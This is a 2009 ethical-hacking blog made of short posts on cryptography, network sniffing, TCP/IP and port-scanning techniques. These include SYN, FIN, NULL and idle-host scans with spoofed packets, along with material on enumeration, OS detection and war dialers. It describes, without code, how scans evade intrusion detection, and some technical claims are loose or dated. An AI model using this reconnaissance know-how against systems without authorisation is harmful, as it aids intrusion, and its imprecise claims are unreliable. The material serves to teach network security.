Talented people can reverse-engineer software that uses an algorithm and know its internal working. Well, if that is true, how do you keep the data safe if everyone knows how it’s done? The solution is in the key. The key is a complex sequence of alpha-numeric characters, used as an input to the encryption algorithm. If you can keep the key unknown and unknowable, that goes a very long way in keeping the data safe from prying eyes.

LONGER KEY IS BETTER

For keys to be secure, they must be lengthy i.e. a 128-bit key is more secure than a 56-bit key. Longer keys are generally much harder to crack. Look at it this way, of the house keys shown below, which do you think would be safer to use?

Symmetric Algorithms

2009-07-19T03:53:00.001-07:00

Symmetric algorithms use one key to encrypt data and the same key to decrypt it.

Your front door key is symmetric — you use the same key to lock as well as unlock your door. The secret to the security of your front door is that you have the key with you and you don’t give a copy to anyone else. If you do trust someone else with the key, it will always be an exact copy of the one you have.

DES

Triple DES

IDEA

AES

CRYPTOGRAPHY

2009-07-15T10:47:00.000-07:00

Cryptography is the practice and study of hiding information.

Related Terms :
Plaintext: Decrypted or unencrypted data (it doesn’t have to be text only)

Encrypt: Scrambling data using an algorithm to make it unrecognizable
Decrypt: Unscrambling data to its original format
Cipher: Another word for algorithm
Secret key: The secret key is a complex sequence of alpha-numeric characters, used as an input to the encryption algorithm. The algorithm will produce a different output depending on the specific key being used at the time. They allow you to scramble and unscramble data. As the same key is used to open or close a door lock, similarly, a same secret key must be used both at sender's and receiver's end to encrypt and decrypt the data. MORE ON SECRET KEYS

Ciphertext: This is the scrambled unrecognisable message produced as output. It depends on the plaintext and the secret key. For a given message, two different keys will produce two different ciphertexts.

Do read this WIKIPEDIA entry on Cryptography.

SNIFFING : How it Works

2009-07-11T04:13:00.000-07:00

SNIFFING : HOW IT WORKS?
This section explains how a sniffer grabs all the traffic on the network, and does what it is best at!!

In a network, all network interfaces on a network segment have access to all of the data that travels on the media.
Each network interface has a unique hardware-layer address [MAC Address] and receives data intended for its MAC address in addition to the data that is broadcasted on the network.
The broadcast nature of shared media networks affects network performance and reliability so greatly that networking professionals use a network analyzer, or sniffer, to troubleshoot problems.
In the hands of an experienced system administrator, a sniffer is an invaluable aid in determining why a network is behaving (or misbehaving) the way it is.
A sniffer puts a network interface in promiscuous mode so that the sniffer can monitor each data packet on the network segment.
With an analyzer, you can determine how much of the traffic is due to which network protocols, which hosts are the source of most of the traffic, and which hosts are the destination of most of the traffic.
You can also examine data traveling between a particular pair of hosts and categorize it by protocol and store it for later analysis offline.
Most commercial network sniffers are rather expensive, costing thousands of dollars. When you examine these closely, you notice that they are nothing more than a portable computer with an Ethernet card and some special software. The only item that differentiates a sniffer from an ordinary computer is software.
It is easy to download shareware and freeware sniffing software.
The easy availability of this software also means that malicious computer users with access to a network can capture all the data flowing through the network.
The sniffer can capture all the data for a short period of time or selected portions of the data for a fairly long period of time.

SNIFFING : Low Level Protocol Information

2009-07-11T02:27:00.000-07:00

Information network protocols send between computers includes hardware addresses of local network interfaces, the IP addresses of remote network interfaces, IP routing information, and sequence numbers assigned to bytes on a TCP connection. A sniffer can obtain any of these data. After an attacker has this kind of information, he or she is in a position to turn a passive attack into an active attack with even greater potential for damage.

SNIFFING : Private Data

2009-07-11T02:26:00.000-07:00

Loss of privacy is also common in e-mail transactions. Many e-mail messages have been publicized without the permission of the sender or receiver. It is not at all uncommon for e-mail to contain confidential business information or personal information. Even routine memos can be embarrassing when they fall into the wrong hands.

The most famous instance is the Iran-Contra affair in which President Reagan’s secretary of defense, Caspar Weinberger, was convicted. A crucial piece of evidence was backup tapes of PROFS e-mail on a National Security Agency computer. The e-mail was not intercepted in transit, but in a typical networked system, it could have been.

SNIFFING : Financial Account Numbers

2009-07-11T02:24:00.000-07:00

Most users are uneasy about sending financial account numbers, such as credit card numbers and checking account numbers, over the Internet. The privacy of each user’s credit card numbers is important.

Presumably, businesses making electronic transactions are as fastidious about security, so the highest risk comes from the same local network in which the users are typing passwords.

However, much larger potential losses exist for businesses that conduct electronic funds transfer or electronic document interchange over a computer network. These transactions involve the transmission of account numbers that a sniffer could pick up; the thief could then transfer funds into his or her own account or order goods paid for by a corporate account.

SNIFFING PASSWORDS

2009-07-11T02:14:00.001-07:00

Theft of passwords is the most disastrous thing that can happen to a company or a person. Typical users type a password at least once a day. Data is often thought of as secure because access to it requires a password. Users usually are very careful about guarding their password by not sharing it with anyone and not writing it down anywhere.

When the user types any of these passwords, the system sends each character in a password across the network, which is extremely easy for any Ethernet sniffer to see. End users do not realize just how easily these passwords can be found by someone using a simple and common piece of software.

SNIFFING : HOW IT THREATENS SECURITY

2009-07-11T02:14:00.000-07:00

Sniffing data from the network leads to loss of privacy of several kinds of information that should be private for a computer network to be secure. These kinds of information include the following:

SNIFFER

2009-07-10T23:46:00.000-07:00

SNIFFING is the use of a network interface to receive data not intended for the machine in which the interface resides.

Network analyzers or SNIFFERS monitor network data. A sniffer is a piece of software that captures the traffic on a network.
Sniffers usually act as network probes or "snoops" -- examining network traffic but NOT intercepting or altering it.
Most sniffers work only with TCP/IP packets.
A network analyzer or SNIFFER helps network administrators diagnose a variety of obscure problems that may not be visible on any one particular host.
A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming.
SNIFFER : HOW IT WORKS !?
WIRESHARK is the most popular network sniffer.

Devices that incorporate sniffing are useful and necessary. However, their very existence implies that a malicious person could use such a device or modify an existing machine to snoop on network traffic. Sniffing programs could be used to gather passwords, read inter-machine e-mail, and examine client-server database records in transit. Besides these high-level data, low-level information might be used to mount an active attack on data in another computer system. For more information : SNIFFING : HOW IT THREATENS SECURITY

OPERATING SYSTEM (OS) DETECTION

2009-07-09T04:27:00.000-07:00

Operating System detection is a technique to determine the Operating System running on the target PC, then exploit vulnerabilities associated with that Operating System.

Each company has its own way of implementing the TCP/IP stack, so it responds to certain scans in its unique way, which determines the OS.
An exact query sent to one OS will respond differently from the exact same query sent to different OS, usually allows us to enumerate information about the Operating System.
Some OSes run particular services on certain ports, so OS can be determined if these ports are open. Example : If ports 137, 138, 139, 445 are open on a system, it is Windows 2000

You have an idea how OS Detection works. Lets study OS DETECTION STRATEGIES in detail.

TOOLS : NMap, CHECKOS

NETWORK ENUMERATION

2009-07-07T23:58:00.000-07:00

Enumeration helps identify a user account or system account for potential use in hacking the target system.

It isn’t necessary to find a system administrator account, because most account privileges can be escalated to allow the account more access than was previously granted.
Enumeration involves active connections to systems and directed queries.
The type of information enumerated by intruders:
* Network resources and shares
* Users and groups
* Applications and banners

NULL SCAN

2009-07-06T04:48:00.000-07:00

The NULL scan unsets ALL flags available in the TCP header. ACK, FIN, RST, SYN, URG, PSH all become unassigned.

If the port OPEN.
client -> NULL (no flags)
server -> -

Alternatively, an RST packet will be returned if a CLOSED port has been reached
client -> NULL (no flags)
server -> RST

FIN Scan

2009-07-06T04:32:00.000-07:00

This works very similar to the SYNACK scan, with inverse mapping used to determine open or closed ports. The basis is that closed ports are required to reply to the probe packet with an RST, while open ports must ignore the packets in question.

client -> FIN

server -> -

No reply signaled by the server is iconic of an open port. The server'soperating system silently dropped the incoming FIN packet to the service running on that port.

Opposing this is the RST reply by the server upon a closed port reached. Since, no service is bound on that port, issuing a FIN invokes a reset(RST) response from the server.

client -> FIN

server -> RST

The scan attempts to exploit vulnerabilities in BSD code. Since most OS are based on BSD or derived from BSD, this was a scan that returned fairly good results. However, most OS have applied patches to correct the problem. However, there remains a possibility that the attacker may come across one where these patches have not been applied.

SYN | ACK Scan

2009-07-06T04:20:00.001-07:00

A SYN | ACK flagged bit sent to a closed port elicits a RST response, while an open port will not reply. This is because the TCP protocol requires a SYN flag to initiate the connection.
This scan has a tendency to register fairly large false positives. For instance , packets dropped by filtering devices, network traffic, timeouts etc can given a wrong inference of an open port while the port may or may not be open.

The server ignores the SYN | ACK packet sent to an OPEN PORT.

client -> SYN | ACK
server -> -

Advantages : fast, avoids basic IDS/firewalls, avoids TCP three-way handshake
Disadvantages: less reliable (false positives)

STEALTH SCANNING

2009-07-06T04:11:00.000-07:00

The definition of a "stealth" scan has varied over recent years from what Chris Klaus, author of a paper titled "Stealth Scanning: Bypassing Firewalls/SATAN Detectors" delineated. Originally the term was used to describe a technique that avoided IDS and logging, now know as "half-open" scanning.

However, nowadays stealth is considered to be any scan that is concerned with a few of the following:
* setting individual flags (ACK, FIN, RST, .. )
* NULL flags set
* All flags set
* bypassing filters, firewalls, routers
* appearing as casual network traffic
* varied packet dispersal rates

IP ID Header or "DUMB" scanning

2009-07-06T02:41:00.000-07:00

IP ID Header or "DUMB" scanning

ID header scanning technique was discovered by antirez, who described it's technical details in a post to bugtraq. Evidently the basis of this scans implementation is reflective on the SYN scan method, although involves a third party host to use as a dummy source.

SILENT or DUMB HOST : is a server that sends and receives little to no traffic at all, hence the characteristic name endowed upon it. Locating one of these hosts requires much effort and host sweeping itself, and is probably more trouble than what it is worth.

Involved in this scenario are three hosts:
* A -> attackers host
* B -> dumb host
* C -> target host

Let's examine this cycle.
* Host A sends a series of ping's analysing the ID field, encapsulated within the IP header to Host B. A dumb host will have the ID increment the reply by 1 each time during the PING sequence.
60 bytes from BBB.BBB.BBB.BBB: seq=1 ttl=64 id=+1 win=0 time=96 ms
60 bytes from BBB.BBB.BBB.BBB: seq=2 ttl=64 id=+1 win=0 time=88 ms
60 bytes from BBB.BBB.BBB.BBB: seq=3 ttl=64 id=+1 win=0 time=92 ms
* Host A sends a spoofed SYN packet to Host C using the source address of Host B. The remote port is any arbitrary port (1-65535) that the attacker wishes to test for open/closed responses. Host C will reply to Host B with one of two standard responses:
-> SYNACK response indicates an open LISTENING port. Host B will then reply with an RST bit flagged in the packet (automated by kernel).
-> RSTACK will indicate a NON-LISTENING port, (a standard SYN scan method reply), and Host B will ignore that packet and send nothing in reply.

Now, how could Host A know what flags were sent to Host B ?
Well, assuming the port was open on the target server, our series of parallel PING's that Host A had been sending whilst the spoofed SYN packets were being sent will hold our answers.

Analyzing the ID field in these PING responses, one would notice a higher ID increment.
60 bytes from BBB.BBB.BBB.BBB: seq=25 ttl=64 id=+1 win=0 time=92 ms
60 bytes from BBB.BBB.BBB.BBB: seq=26 ttl=64 id=+3 win=0 time=80 ms
60 bytes from BBB.BBB.BBB.BBB: seq=27 ttl=64 id=+2 win=0 time=83 ms

Notice the second and third packets ID responses contain values greater than 1, hence an open port was located. Any further increment of more than 1 is indicative of an open port in Host B's responses, during this period.

Originally, the increment was 1, but because Host A sent a spoofed SYN to an open port, Host B had to reply to Host C with the SYNACK bit packet, thus incrementing the ID field. Following this the PING response to Host A would then in turn have a higher ID field, as suspected.

On the other hand, a closed port state on Host C would not require Host B to send anything, so the ID field in the PING response would not be incremented at all.
60 bytes from BBB.BBB.BBB.BBB: seq=30 ttl=64 id=+1 win=0 time=90 ms
60 bytes from BBB.BBB.BBB.BBB: seq=31 ttl=64 id=+1 win=0 time=88 ms
60 bytes from BBB.BBB.BBB.BBB: seq=32 ttl=64 id=+1 win=0 time=87 ms

Once again this is why a "dumb" host is required, so incoming and outgoing traffic is kept at a bare minimum in order to decrease false-positive results.

SYN SCAN

2009-07-06T02:31:00.000-07:00

The implementation of this scan method is similar to a full TCP connect() three way handshake except instead of sending ACK responses we immediately tear down the connection.

client -> SYN
server -> SYN | ACK
client -> RST
This example has shown the target port was open, since the server responded with SYN ACK flags. The RST bit is kernel oriented, that is, the client need not send another packet with this bit, since the kernel's TCP/IP stack code automates this. Inversely, a closed port will respond with RST ACK.
client -> SYN
server -> RST | ACK

As such, this scan method will often go unlogged by connection based IDS', and will return fairly positive results (reliability of open/closed port recognition). Instead of sending ACK responses, we immediately tear down the connection.

As is displayed, this combination of flags is indicative of a non- listening port. Although, this technique has become rather easy to detect by many IDS, owing to the fact that a paramount of Denial of Service (DoS) utilities base their attacks by sending excess SYN packets.

Fairly standard intrusion detection systems are no doubt capable of logging these half-open scans: TCP wrappers, SNORT, Courtney, iplog. Notoriously, the SYN method was first used to avoid a well used IDS, named SATAN.

Advantages : fast, reliable, avoids basic IDS, avoids TCP three-way handshake

Disadvantages: require root privileges, rulesets block many SYN scan attempts

HALF-OPEN SCANNING

2009-06-29T21:12:00.001-07:00

The term 'half-open' applies to the way the client terminates the connection before the three-way handshake is completed. As such, this scan method will often go unlogged by connection based IDS', and will return fairly positive results (reliability of open/closed port recognition).

We have seen that a TCP connect () scan can be easily logged as the IDS can detect a complete connection being initiated from outside and being established. One way hackers began evading this detection while meeting their objective was to do a half open scan. In a half open scan, a complete TCP connection is not established. Instead, as soon as the server acknowledges with a SYNACK response, the client tears down the connection by sending a RST (or reset connection) flag. This way, the attacker detects an open port listening / running a service from the ACK response, and at the same time succeeds in not establishing a full connect ( ) system call by sending the RST from the kernel level.

HALF-OPEN SCAN is of two types :

TCP Ports

2009-06-29T11:27:00.000-07:00

A port is a number between 1 and 65,535, and port number references are usually specific to an application.
Network makes the use of ports which are basically numbers to distinguish between which data packet is received by which application.
A list of well known, registered, and dynamic port numbers is maintained by the Internet Assigned Numbers Authority (IANA) at this location:
http://www.iana.org/assignments/port-numbers

Reverse - Ident

2009-06-29T11:14:00.001-07:00

UNIX offers a service called ident or auth which will identify the user of a TCP connection. In the intended operation of this feature, when a user connects to a server, the server sends back a request to the ident service to discover the user's identity.

However, it can also be used in a reverse way. If a server itself also has the ident feature turned on, when a user connects to the server, the user can query the identify of the service it is connecting to.

This helps discover possible accounts that can be broken into.

technique involves issuing a response to the ident/auth daemon, usually port 113 to query the service for the owner of the running process.
Finds daemons running as root.
Intruder finds a vulnerable overflow and instigate other suspicious activities involving this port.
identd could release miscellaneous private information such as:
* user info
* entities
* objects
* processes

ADVANTAGES : fast, requires no additional priveleges, return vital service information.
DISADVANTAGES : Easily Detectable

TCP Connect Scan

2009-06-29T10:54:00.000-07:00

The TCP connect() scan is named after the connect() call that's used by the operating system to initiate a TCP connection to a remote device. This scan method uses the same TCP handshake connection that every other TCP-based application uses on the network. An active(Open) port sends a SYN|ACK exsuring that it is open, whereas a closed port sends a RST ensuring that it is closed.

TCP Connection with an open port

TCP Connection with a Closed Port

Advantages of the TCP connect() Scan

No special privileges are required to run the TCP connect() scan.
Accurate Results
NMap uses the operating system's normal method of connecting to remote devices via TCP before it tears down the connection with the RST packet.

Disadvantages of the TCP connect() Scan

Since the TCP connect() scan is completing a TCP connection, normal application processes immediately follow. These applications are immediately met with a RST packet, but the application has already provided the appropriate login screen or introductory page. By the time the RST is received, the application initiation process is already well underway and additional system resources are used.
Easy to detect and filter by IDS and Firewall.

TCP SCAN TYPES

2009-06-27T22:12:00.000-07:00

TCP SCAN TYPES

OPEN SCAN

HALF-OPEN SCAN

STEALTH SCAN

SYN ACK Flags
FIN Flag
ACK Flag
NULL Flag
ALL Flags (XMAS)
tcp fragmenting

SWEEPS

TCP echo
UDP echo
TCP ACK
TCP SYN
ICMP Echo

Misc.

UDP/ICMP Error
FTP Bounce

Transmission Control Protocol [TCP]

2009-06-24T09:26:00.000-07:00

The Transmission Control Protocol/Internet Protocol (TCP/IP) model, describes a set of general design guidelines and implementations of specific networking protocols to enable computers to communicate over a network. TCP/IP provides end-to-end connectivity specifying how data should be formatted, addressed, transmitted, routed and received at the destination.

TCP is a very needy protocol. When a frame with TCP data is sent across the network to another station, the sending station must receive an acknowledgement that the data was received properly. If the sending station doesn't receive an acknowledgement after a certain time period, the data is resent in the hopes that it will make it through the second time. This process continues until either the data makes it through, or the transmission process times out.

TCP doesn't need to know how to traverse the network because it relies on IP to get the data to the other side. Once the data makes the trip across the network, TCP takes over and uses its port numbers to determine where to drop the package. It's possible that IP could properly route the data across the network and TCP would try to drop the data at the specified port, but the receiving station may not be listening on that port. The TCP data would have nowhere to go and the entire packet would be discarded.

Fig. TRANSMISSION CONTROL PROTOCOL STRUCTURE. Click to Enlarge

Learn about TCP/IP Layered Structure - How TCP works?

THE TCP/IP 3-WAY HANDSHAKE

This handshake is often referred to as the "three way handshake" because of the three frames that pass back and forth:

The First Frame – The initial synchronize (SYN) frame is sent from the station initiating the conversation to the destination station. The SYN frame includes initial sequence numbers and the port that will be used for the conversation, as well as other initialization parameters.

The Second Frame – The destination station receives the SYN frame. If everything is in agreement, it sends an acknowledgement to the SYN (called an ACK) and its own SYN parameters.

The Third Frame – The original station receives the ACK to its original SYN, as well as the SYN from the destination device. Assuming everything is in order, the source station sends an ACK to the destination station's SYN.

War Dialers

2009-06-23T21:24:00.000-07:00

A war dialer is a tool used to scan a large pool of telephone numbers to detect vulnerable modems to provide access to the system.
A demon dialer is a tool used to monitor a specific phone number and target its modem to gain access to the system.
Threat is high in systems with poorly configured remote access products providing entry to larger networks.
Tools include THC-Scan, ToneLoc, TBA etc

DOWNLOAD

Detecting LIVE Systems

2009-06-23T20:58:00.000-07:00

Detecting 'Live' Systems On Target Network

Objective is to look for Live Hosts on the target network so that services and vulnerabilities may be enumerated later
To determine the perimeter of the target network /system
To facilitate network mapping
To build an inventory of accessible systems on target network
Can be intrusive, may be setected by IDS

Tools

SCANNING

2009-06-23T20:56:00.000-07:00

Network scanning is a procedure for identifying active hosts on a network, either for the purpose of attacking them or for network security assessment.

Scanning is done with the purpose of :

Detecting 'live' systems on target network.
Discovering services running/ listening on target systems.
Understanding port scanning techniques.
Identifying TCP and UDP services running on target network.
Discovering the operating system
Understanding active and passive fingerprinting

Tools Used : NMap, AngryIPScan

Ethical Hacking

2009-06-23T02:59:00.000-07:00

Problem Definition - Why Security?

Easy to use technology helps normal users to perform cracking.
Increasing complexity of computer infrastructure administration and management.
Decreasing skill level needed for exploits.
Direct impact of security breach on corporate asset base and goodwill
Increased networked environment and network based applications

Can Hacking Be Ethical?

'hacker' -- a person who enjoys learning the details of computer systems and stretch their capabilities.
'hacking' -- rapid development of new programs or the reverse engineering of already existing software to make the code better and efficient.
'cracker' -- a person who uses his hacking skills for offensive and malicious purposes.
'ethical hacker' -- security professionals who utilise their hacking skills for defensive purposes.

HACK (b)LOG - swizardb.blogspot.com

This blog aims to provide you with detailed endless hacking study material and is intended for learning ethical hacking for a hacker of any skill level. Please visit the posts, and leave comments.